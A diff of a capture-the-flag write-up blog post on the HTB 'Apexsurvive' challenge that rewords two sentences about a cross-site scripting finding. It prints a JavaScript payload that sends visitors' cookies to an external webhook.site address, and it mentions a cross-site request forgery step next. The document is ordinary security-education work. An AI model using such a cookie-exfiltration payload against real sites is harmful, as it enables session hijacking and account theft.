aelmosalamy/elmosalamy-blog/content/posts/Apexsurvive Writeup (HTB Cyber Apocalypse 2024)/index.md

 ![](xss-proof.png)

-Since the cookie had `HttpOnly: false`, we could exfiltrate the cookie of anyone who visits the product page with a similar payload:
+Since the cookie had `HttpOnly: false`, we could theoretically exfiltrate the cookie of anyone who visits the product page with a similar payload:
 ```js
 ${fetch('https://webhook.site/REDACTED/'+btoa(document.cookie))}` //
 ```

-We will keep this possibility in mind.
+We will keep this in our pocket, maybe we will need it.

 ### Cross Side Request Forgery
 Okay, we are unable to steal the bot's cookie due to Same-origin Policy (SOP) imposed by the cookie's `SameSite` restriction, but we still got the bot to visit our attacker-controlled page, that's big, right?